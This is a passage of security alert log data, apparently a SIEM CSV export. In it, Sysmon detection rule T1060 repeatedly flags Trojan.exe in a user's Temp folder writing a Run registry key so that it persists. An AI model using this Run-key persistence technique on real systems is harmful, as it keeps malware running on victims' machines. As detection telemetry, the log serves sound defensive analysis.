HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:25:27.893"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:40.023",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:26.878 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:26.879105500Z"",""eventRecordID"":""1492"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:26.878\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:26.878"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:39.000",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:25.862 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:25.865294100Z"",""eventRecordID"":""1490"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:25.862\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:25.862"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:22:38.138",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:24.832 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:24.836634800Z"",""eventRecordID"":""1489"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:24.832\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:25:24.832"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:36.967",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:23.815 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:23.817359000Z"",""eventRecordID"":""1487"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:23.815\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:23.815"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:36.957",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:22.799 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:22.817621700Z"",""eventRecordID"":""1485"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:22.799\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:22.799"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:22:36.834",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:21.783 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:21.785633200Z"",""eventRecordID"":""1484"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:21.783\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:25:21.783"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:33.928",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:20.768 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:20.769788300Z"",""eventRecordID"":""1483"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:20.768\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:20.768"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:32.881",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:19.752 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:19.760592900Z"",""eventRecordID"":""1482"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:19.752\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:19.752"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:22:31.849",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:18.736 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:18.740224000Z"",""eventRecordID"":""1480"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:18.736\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:25:18.736"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:30.852",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:17.721 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:17.734902400Z"",""eventRecordID"":""1479"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:17.721\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:17.721"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:29.815",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:16.705 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:16.707580200Z"",""eventRecordID"":""1477"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:16.705\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 